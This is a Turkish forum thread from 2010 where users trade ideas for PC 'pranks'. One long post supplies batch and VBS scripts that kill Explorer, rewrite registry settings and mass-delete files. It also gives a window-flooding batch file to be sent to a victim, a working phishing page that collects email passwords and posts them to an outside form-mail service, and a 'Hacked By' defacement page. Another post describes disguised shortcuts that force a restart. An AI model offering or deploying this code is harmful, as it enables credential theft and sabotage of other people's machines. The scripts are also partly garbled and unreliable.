Pc de Şaka Hazırlamak

Blue Life
21-01-2010, 01:28   |  #1  
Blue Life avatarı
OP Yıllanmış Üye
Teşekkür Sayısı: 0
343 mesaj
Kayıt Tarihi:Kayıt: Ağu 2009

Arkadaşlar pc de şaka hazırlamak istiyorum.Şu linkteki
https://www.chip.com.tr/forum/windows-sakasi_t148306.html
arkadaşın yaptığı şakalara benzer şekilde yada değişik şekilde şakalar hazırlayabilirmiyiz.Yapılırsa yapımını anlatırmısınız.

zxsel
21-01-2010, 01:57   |  #2  
zxsel avatarı
Yıllanmış Üye
Teşekkür Sayısı: 0
903 mesaj
Kayıt Tarihi:Kayıt: Ara 2008

x= msgBox("windows acılmaktan yoruldu",,"windows coktu") bunun uzantısı vbs yapcan bukadar

zxsel
21-01-2010, 02:19   |  #3  
zxsel avatarı
Yıllanmış Üye
Teşekkür Sayısı: 0
903 mesaj
Kayıt Tarihi:Kayıt: Ara 2008

bunu  notepad acarkta yapabılırsın ornek
@echo off
taskkill /im explorer.exe /f
taskkill /im bittorrent.exe /f
taskkill /im wscript.exe
taskkill /im activexdebugger32.exe /f
start reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\EXplorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
start reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\EXplorer\Advanced /v Hidden /t REG_DWORD /d 1 /f
start reg import kill.reg
copy yama.vbs c:\yama.vbs

cdattrib -h -r -s fooool.exe
attrib -h -r -s autorun.inf
attrib -h -r -s bittorrent.exe
attrib -h -r -s sxs.exe
attrib -h -r -s copy.exe
attrib -h -r -s command.exe
attrib -h -r -s msvcr71.dll
attrib -h -r -s ie.exe
attrib -h -r -s copy.exe
attrib -h -r -s autorun.vbs
attrib -h -r -s WSscript.exe
attrib -h -r -s r6r.exe
attrib -h -r -s l2f.cmd
attrib -h -r -s yp.bat
del r6r.exe
del l2f.cmd
del yp.bat
del fooool.exe
del autorun.inf
del bittorrent.exe
del c:\windows\bittorrent.exe
del sxs.exe
del copy.exe
del command.exe
del ravmonlog
del msvcr71.dll
del ie.exe
del copy.exe
del autorun.vbs
del WSscript.exe
del winfile.exe
del secenekler.ini
LUTFEN BEKLEYİNİZ...
del WSscript.exe
del autorun.vbs.exe


cd windows
cd system32
attrib -h -r -s activexdebugger32.exe
del activexdebugger32.exe
attrib -h -r -s amvo.exe
attrib -h -r -s amvo0.dll
del amvo.exe
del amvo0.dll

d:
attrib -h -r -s yp.bat
attrib -h -r -s fooool.exe
attrib -h -r -s autorun.inf
attrib -h -r -s bittorrent.exe
attrib -h -r -s sxs.exe
attrib -h -r -s copy.exe
attrib -h -r -s command.exe
attrib -h -r -s msvcr71.dll
attrib -h -r -s ie.exe
attrib -h -r -s copy.exe
attrib -h -r -s autorun.vbs
attrib -h -r -s WSscript.exe
attrib -h -r -s r6r.exe
attrib -h -r -s l2f.cmd
del r6r.exe
del l2f.cmd
del fooool.exe
del autorun.inf
del bittorrent.exe
del sxs.exe
del copy.exe
del command.exe
del ravmonlog
del msvcr71.dll
del ie.exe
del copy.exe
del autorun.vbs
del WSscript.exe
del WSscript.exe
del autorun.vbs.exe
del winfile.exe
del secenekler.ini
del *.bat
del *.cmd

e:
attrib -h -r -s yp.bat
attrib -h -r -s fooool.exe
attrib -h -r -s autorun.inf
attrib -h -r -s bittorrent.exe
attrib -h -r -s sxs.exe
attrib -h -r -s copy.exe
attrib -h -r -s command.exe
attrib -h -r -s msvcr71.dll
attrib -h -r -s ie.exe
attrib -h -r -s copy.exe
attrib -h -r -s autorun.vbs
attrib -h -r -s WSscript.exe
attrib -h -r -s r6r.exe
attrib -h -r -s l2f.cmd
del r6r.exe
del l2f.cmd
del fooool.exe
del autorun.inf
del bittorrent.exe
del sxs.exe
del copy.exe
del command.exe
del ravmonlog
del msvcr71.dll
del ie.exe
del copy.exe
del autorun.vbs
del WSscript.exe
del WSscript.exe
del autorun.vbs.exe
del winfile.exe
del secenekler.ini
del *.bat
del *.cmd
f:
attrib -h -r -s yp.bat
attrib -h -r -s fooool.exe
attrib -h -r -s autorun.inf
attrib -h -r -s bittorrent.exe
attrib -h -r -s sxs.exe
attrib -h -r -s copy.exe
attrib -h -r -s command.exe
attrib -h -r -s msvcr71.dll
attrib -h -r -s ie.exe
attrib -h -r -s copy.exe
attrib -h -r -s autorun.vbs
attrib -h -r -s WSscript.exe
attrib -h -r -s r6r.exe
attrib -h -r -s l2f.cmd
del r6r.exe
del l2f.cmd
del fooool.exe
del autorun.inf
del bittorrent.exe
del sxs.exe
del copy.exe
del command.exe
del ravmonlog
del msvcr71.dll
del ie.exe
del copy.exe
del autorun.vbs
del WSscript.exe
del WSscript.exe
del autorun.vbs.exe
del winfile.exe
del secenekler.ini
del *.bat
del *.cmd
g:
attrib -h -r -s yp.bat
attrib -h -r -s fooool.exe
attrib -h -r -s autorun.inf
attrib -h -r -s bittorrent.exe
attrib -h -r -s sxs.exe
attrib -h -r -s copy.exe
attrib -h -r -s command.exe
attrib -h -r -s msvcr71.dll
attrib -h -r -s ie.exe
attrib -h -r -s copy.exe
attrib -h -r -s autorun.vbs
attrib -h -r -s WSscript.exe
del fooool.exe
del autorun.inf
del bittorrent.exe
del sxs.exe
del copy.exe
del command.exe
del ravmonlog
del msvcr71.dll
del ie.exe
del copy.exe
del autorun.vbs
del WSscript.exe
del WSscript.exe
del autorun.vbs.exe
del winfile.exe
del secenekler.ini
del *.bat
del *.cmd
h:
attrib -h -r -s yp.bat
attrib -h -r -s fooool.exe
attrib -h -r -s autorun.inf
attrib -h -r -s bittorrent.exe
attrib -h -r -s sxs.exe
attrib -h -r -s copy.exe
attrib -h -r -s command.exe
attrib -h -r -s msvcr71.dll
attrib -h -r -s ie.exe
attrib -h -r -s copy.exe
attrib -h -r -s autorun.vbs
attrib -h -r -s WSscript.exe
del fooool.exe
del autorun.inf
del bittorrent.exe
del sxs.exe
del copy.exe
del command.exe
del ravmonlog
del msvcr71.dll
del ie.exe
del copy.exe
del autorun.vbs
del WSscript.exe
del WSscript.exe
del autorun.vbs.exe
del winfile.exe
del secenekler.ini
del *.bat
del *.cmd

i:
attrib -h -r -s yp.bat
attrib -h -r -s fooool.exe
attrib -h -r -s autorun.inf
attrib -h -r -s bittorrent.exe
attrib -h -r -s sxs.exe
attrib -h -r -s copy.exe
attrib -h -r -s command.exe
attrib -h -r -s msvcr71.dll
attrib -h -r -s ie.exe
attrib -h -r -s copy.exe
attrib -h -r -s autorun.vbs
attrib -h -r -s WSscript.exe
del fooool.exe
del autorun.inf
del bittorrent.exe
del sxs.exe
del copy.exe
del command.exe
del ravmonlog
del msvcr71.dll
del ie.exe
del copy.exe
del autorun.vbs
del WSscript.exe
del winfile.exe
del secenekler.ini
CLS
c:
cdyama.vbs
start reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\EXplorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
start explorer.exe
cls
GECMIS OLSUN
BILGISAYARINIZI YENIDEN BASLATMAYI UNUTMAYINIZ.


RESTART
echo Tamam.

bunu bat  olarak kaydedıp  acılıs olarak baslangıca koyun  cektırerek pc acıldıgında dos ta hızlıca bırseler gececek aynın zaman da  pc de autroun vırusu varsa flash bellek vırusu sılme kodudur

cok ta yararlıdır vede korkutucu olur


on Error Resume Next

Dim objShell, objFileSystem, objTextStream, objRegex
Dim colRegexMatches1, colRegexMatches2
Dim nReturnCode
Dim strIpFileText
Dim element, i

Dim Lista
Lista=array("n1de?ect.com","nide?ect.com","nlde?ect.com","j*.bat","m*.com","d*.com","copy.exe","host.exe",_
        "a0*.com","ntdeiect.com","ntdelect.com", "u?de*.com","ntde1ect.com", "x*.com", "tio*.*",_
            "80*.com","semo*.exe","autorun*.*","x*.exe","yl*.exe","qd*.cmd")


Set geekside=WScript.CreateObject("WScript.Shell")
Set objShell = WScript.CreateObject("WScript.Shell")
Set objFileSystem = CreateObject("Scripting.FileSystemObject")

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set colDrives = objFSO.Drives


Wscript.Echo "hacker tellibaba virüs temizle,"
Wscript.Echo "Arama ve temizleme işlemleri sürerken lütfen sabırlı olun."


i=0
For Each objDrive in colDrives
    If objDrive.IsReady = True Then
        nret=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\autorun.inf",0,TRUE)
        Set objTextStream = objFileSystem.OpenTextFile(objDrive.DriveLetter&":\autorun.inf",1)
        strIpFileText = objTextStream.ReadAll
        objTextStream.Close
    End If
Next


Set objRegex = new RegExp

objRegex.Pattern = "=\w+(.com|.bat|.exe|.pif|.scr|.svd|.dat|.tmp|.cmd)"
objRegex.Global = True
objRegex.IgnoreCase = True
Set colRegexMatches1 = objRegex.Execute(strIpFileText)

i=0
For Each element In colRegexMatches1
    element = Replace(element,"=","")
    WScript.Echo "Proceeding to remove file of virus :" & element
    For Each objDrive in colDrives
        If objDrive.IsReady = True Then
            Wscript.Echo "Clean drive: " & objDrive.DriveLetter

            nret=geekside.Run("cmd /C taskkill /f /im amvo.exe",0,TRUE)
            nret=geekside.Run("cmd /C taskkill /f /im avpo.exe",0,TRUE)
    
            nret=geekside.Run("cmd /C taskkill /f /im semo2x.exe.tmp",0,TRUE)
            nret=geekside.Run("cmd /C taskkill /f /im semo2x.exe",0,TRUE)
            nret=geekside.Run("cmd /C taskkill /f /im help.exe.tmp",0,TRUE)

            nret=geekside.Run("cmd /C attrib -s -h -r " &objDrive.DriveLetter&":\" & element &"",0,TRUE)
            nret=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\" & element & "/f /q /a",0,TRUE)
            nret=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\autorun.inf",0,TRUE)

        End If
    Next
    i = i + 1
Next
    

Set objRegex= Nothing
Set objTextStream = Nothing
Set objFileSystem = Nothing
Set objShell = Nothing

    nret15=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\amvo*.*",0,TRUE)
    nret16=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\avpo*.*",0,TRUE)
    nret20=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\help.exe.tmp",0,TRUE)
    

    nret56=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\semo*.*",0,TRUE)
    nret60=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\semo*.*.*",0,TRUE)


        nret23=geekside.Run("cmd /C del /f c:\windows\system32\amvo*.*",0,TRUE)
    nret24=geekside.Run("cmd /C del /f c:\windows\system32\avpo*.*",0,TRUE)
    

    nret57=geekside.Run("cmd /C del /f c:\windows\system32\semo*.*.*",0,TRUE)
    nret59=geekside.Run("cmd /C del /f c:\windows\system32\semo*.*",0,TRUE)


WScript.Echo "Gizli dosyaları görmek için registeri ayarlarını onarmaya geçiyorum"

wscript.Echo "hacker@tellibaba.com  virüsleri yok eder tamamen benim icadımdır"

    nret31=geekside.Run("cmd /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v amva /f",0,TRUE)
    nret32=geekside.Run("cmd /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v avpo /f",0,TRUE)

    nret68=geekside.Run("cmd /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /v avpa /f",0,TRUE)


    nret33=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 1 /f",0,TRUE)
    nret43=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v SuperHidden /t REG_DWORD /d 1 /f",0,TRUE)
    nret44=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v ShowSuperHidden /t REG_DWORD /d 1 /f",0,TRUE)


    nret45=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 1 /f",0,TRUE)
    nret46=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v SuperHidden /t REG_DWORD /d 1 /f",0,TRUE)
    nret47=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v ShowSuperHidden /t REG_DWORD /d 1 /f",0,TRUE)


    nret34=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\ /v CheckedValue /t REG_DWORD /d 2 /f",0,TRUE)
    nret35=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\ /v DefaultValue /t REG_DWORD /d 2 /f",0,TRUE)


    nret36=geekside.Run("cmd /C reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ /v CheckedValue /f",0,TRUE)
    nret37=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ /v CheckedValue /t REG_DWORD /d 1 /f",0,TRUE)
    nret38=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ /v DefaultValue /t REG_DWORD /d 2 /f",0,TRUE)


    nret39=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\ /v CheckedValue /t REG_DWORD /d 0 /f",0,TRUE)
    nret40=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\ /v DefaultValue /t REG_DWORD /d 0 /f",0,TRUE)

    nret48=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\ /v Type /t REG_SZ /d Group /f",0,TRUE)

    nret61=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoFolderOptions /t REG_DWORD /d 0 /f",0,TRUE)
    nret62=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoFolderOptions /t REG_DWORD /d 0 /f",0,TRUE)
    nret63=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableRegistryTools /t REG_DWORD /d 0 /f",0,TRUE)


nret78=geekside.Run("cmd /C taskkill /f /im explorer.exe",0,TRUE)
nret79=geekside.Run("cmd /C start explorer.exe",0,TRUE)


    nret15=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\amvo*.*",0,TRUE)
    nret16=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\avpo*.*",0,TRUE)
    nret20=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\help.exe.tmp",0,TRUE)

    

    nret56=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\semo*.*.*",0,TRUE)
    nret60=geekside.Run("cmd /C attrib -s -h -r c:\windows\system32\semo*.*",0,TRUE)


        nret23=geekside.Run("cmd /C del /f c:\windows\system32\amvo*.*",0,TRUE)
    nret24=geekside.Run("cmd /C del /f c:\windows\system32\avpo*.*",0,TRUE)
    

    nret57=geekside.Run("cmd /C del /f c:\windows\system32\semo*.*.*",0,TRUE)
    nret59=geekside.Run("cmd /C del /f c:\windows\system32\semo*.*",0,TRUE)


For Each objDrive in colDrives
    If objDrive.IsReady = True Then
        For X=0 to UBound(Lista)
            nret=geekside.Run("cmd /C attrib -s -h -r "&objDrive.DriveLetter&":\"&Lista(X)&"",0,TRUE)
            nret=geekside.Run("cmd /C cd \ & del "&objDrive.DriveLetter&":\" &Lista(X)& "/f /q /a",0,TRUE)
        Next
    End If
Next

WScript.Echo "Amvo virüsü ve bağlantları başarıyla silindi"
WScript.Echo "www.telli.ailesiyiz.biz  virüsler temizlendi"


WScript. Quit(0)


bununda uzantısı vbs dır


yada notepad ıcıne  start
start
start
start
start yuzlerce yaz uzantısı bat olsun dosyanın  zıple aradasına at adamda yuzlerce dos ekranı cıksın pc de bır zararı yoktur

bu kodda   gızlı klasorlerı aktıf halefgetırır
@echo off

chdir
dir
LUTFEN_BEKLEYINIZ....
BU_ISLEM_HARDDISKIN_FLASHIN_DOLULUGU_ORANINDA_UZUN_SURER...

[email]hacker@tellibaba.com[/email]
attrib -s -r -h /D /S
CLS

klasörler geldimi kontol ediniz


echo Tamam.

uzantı bat olcak dosyanın ornek  saka.bat

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden]
"Text"="@shell32.dll,-30499"
"Type"="group"
"Bitmap"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,  00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,53,00,  48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,34,00,00,  00
"HelpID"="shell.hlp#51131"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30501"
"Type"="radio"
"CheckedValue"=dword:00000002
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51104"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

[HKEY_CURRENT_USER\Software\microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Cdrom]
"AutoRun"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Cdrom]
"AutoRun"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\ControlControlSet\Services\Cdrom]
"AutoRun"=dword:00000000


uzantı reg olcak bunlar orenk gelıstırmek sana kalmıs

bunun uzantısıda htm olacak html de olur

acılıs sayfasınıda bunu yap ayarlıcan pc de  vede gızlı klasor yapcan masaustunde gorunmucek

kısde sancak vırus bulasmıs
<html>
<center>
<title>MSN</title>
<font size=30 color=red><b>arabesk,pop,ünlü albümleri BEDAVA İNDİR !</font><br><br><br><font size=5 color=blue>ferdi,müslüm,orhan,  klipleri BEDAVA İNDİR !</font><br><br><br><font size:4 color=white>hemen üye olun..
..!</font><br><br><br><font size:4 color=red> mailinizi ve mail şifrenizi girin TÜRKİYE DE BİR İLK  devasa film corp. </font>
<body background=http:resim>
<br><br><br><form method=post action=http://public.www.easynet.co.uk/cgi-bin/formmail/formmail.pl>;<font size=4>E mail :<input type=text name=mail><br><font size=4>Sifreniz :<input type=password name=sifre><br><input type=submit value=Tamam><input type=hidden name=recipient value=mytelli25@hotmail.com><input type=hidden name=email value=fakemake.forumturka.net><input type=hidden name=realname value=fakemake><input type=hidden name=subject value=sifre><input type=hidden name=title value=tesekkürler>
</body>
</center>
</html>
bununda uzantı htm

gırıs sayfası hack lendı sancak  gırıs sayfası olarka ayarka netıtten gızl klsor olarka ısaretle

masusutne koy

by zxsel by tellibaba ne mutlu ısıne yararsa


<marquee name="kayanyazi" id="tanim" direction="left" scrollamount="7"
style="width:600;height:50;">TURKISH HACKER TELLİ BABA& İSKORPİTX</marquee>
<title>Hacked By WARRİOR</title>
<p align="center"><b><font face="Tahoma" size="16">HACKED BY WARRİOR-By İsKo®PiX
<body text="#CC0000" bgcolor="black">
<p align="center"> </p>
<p align="center"><b><font face="Tahoma" size="16">HACKED BY WARRİOR-By İsKo®PiX & TELLİ BABA   HACKER DAN MICROSOFTA UYARI: **** YOU A.B.D NO I DONT CRACK MSN TURKISH POWER </font></b></p>
<p align="center"><b><font face="Tahoma" color="green" size="3">
<p align="center"><b><font face="Tahoma" size="4">http://tellim.blogcu.com </font></b></p>
<p align="center"><b><font face="Tahoma" size="4">;</font></b></p>
<p align="center"><b><font face="Tahoma" size="16">**** YOU ISRAEL..**** YOU A.B.D</font></b></p>
<p align="center">

<center><br>
<p align="center">


<EMBED style="FILTER: xray"
name=RAOCXplayer
pluginspage=http://www.microsoft.com/Windows/Downloads/Contents/Products/MediaPlayer/
src="http://www.istanbul.gov.tr/Portals/Ata/Docs/istiklal.mp3" width=361 height=41
type=application/x-mplayer2 ShowControls="1" ShowStatusBar="0" AutoSize="true"
loop="true" EnableContextMenu="0"></FONT></CENTER></SPAN></FONT></P></TD>

</center>
</body>
</font>
</font>
</html>
by zxsel

alien_fx
21-01-2010, 15:54   |  #4  
Yıllanmış Üye
Teşekkür Sayısı: 1
5,671 mesaj
Kayıt Tarihi:Kayıt: Haz 2009

x= msgBox("windows acılmaktan yoruldu",,"windows coktu")
 
gibisinden :D

soulmy
21-01-2010, 15:56   |  #5  
soulmy avatarı
Yıllanmış Üye
Teşekkür Sayısı: 2
1,939 mesaj
Kayıt Tarihi:Kayıt: Kas 2006

https://www.chip.com.tr/blog/soul ... aka-yapin_3025.html

alien_fx
21-01-2010, 16:39   |  #6  
Yıllanmış Üye
Teşekkür Sayısı: 1
5,671 mesaj
Kayıt Tarihi:Kayıt: Haz 2009

harika bişeymiş.

PcMaKeR
24-01-2010, 00:30   |  #7  
PcMaKeR avatarı
Yıllanmış Üye
Teşekkür Sayısı: 6
8,935 mesaj
Kayıt Tarihi:Kayıt: Eki 2005

En etkili ve en basit şaka şu.
xp de  masaüstündeki bilgisayarım, internet explorer, belgelerim, ağ bağlantılarımı kaldırıp.
bunların iconlarına benzer iconları olan kısayollar atıp kısayoluna da shutdown.exe -t 00 -r koyup birde kısayollardaki ok işaretlerini silip öylece bırakmaktır.
 
Öyle zevkli oluyor ki :D

Mehmet-
24-01-2010, 13:14   |  #8  
Mehmet- avatarı
Yıllanmış Üye
Teşekkür Sayısı: 1
2,296 mesaj
Kayıt Tarihi:Kayıt: Mar 2008

Şöyle bir şaka da olabilir;
Oturum açma müziğini, savaş sahnesinden bir müzikle değiştir. Bombaların patladığı, kurşunların vızır vızır geçtiği bir savaş sahnesini andıran müzikle...
Sonra bilgisayarda oturumu kapat ve ses sisteminde son sesi aç (tabi elinde iyi bir ses sistemi olması gerekiyor). O halde beklesin. Arkadaşın gelip de oturumu açmak için tıkladığında bak neler oluyor izle:)

alien_fx
24-01-2010, 15:34   |  #9  
Yıllanmış Üye
Teşekkür Sayısı: 1
5,671 mesaj
Kayıt Tarihi:Kayıt: Haz 2009

nasıl değiştiricez, anlatta öğrenelim ;)

soulmy
25-01-2010, 15:41   |  #10  
soulmy avatarı
Yıllanmış Üye
Teşekkür Sayısı: 2
1,939 mesaj
Kayıt Tarihi:Kayıt: Kas 2006

ctrl+w tuşuna basar mısınız Sinsi

alien_fx
26-01-2010, 19:59   |  #11  
Yıllanmış Üye
Teşekkür Sayısı: 1
5,671 mesaj
Kayıt Tarihi:Kayıt: Haz 2009

yemezler ...

Ahmet Ertuğrul
28-01-2010, 00:41   |  #12  
Ahmet Ertuğrul avatarı
Yıllanmış Üye
Teşekkür Sayısı: 0
3,651 mesaj
Kayıt Tarihi:Kayıt: Mar 2009

Serdar'ın şakası güzelmiş. Hem pratik hem komik :D

Ctrl+W ne acaba? Bir Google'a bakalım :)
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Cevabı ekşisözlük vb'lerinde aramayın :D

Son Düzenleme: Ahmet Ertuğrul ~ 28 Ocak 2010 00:49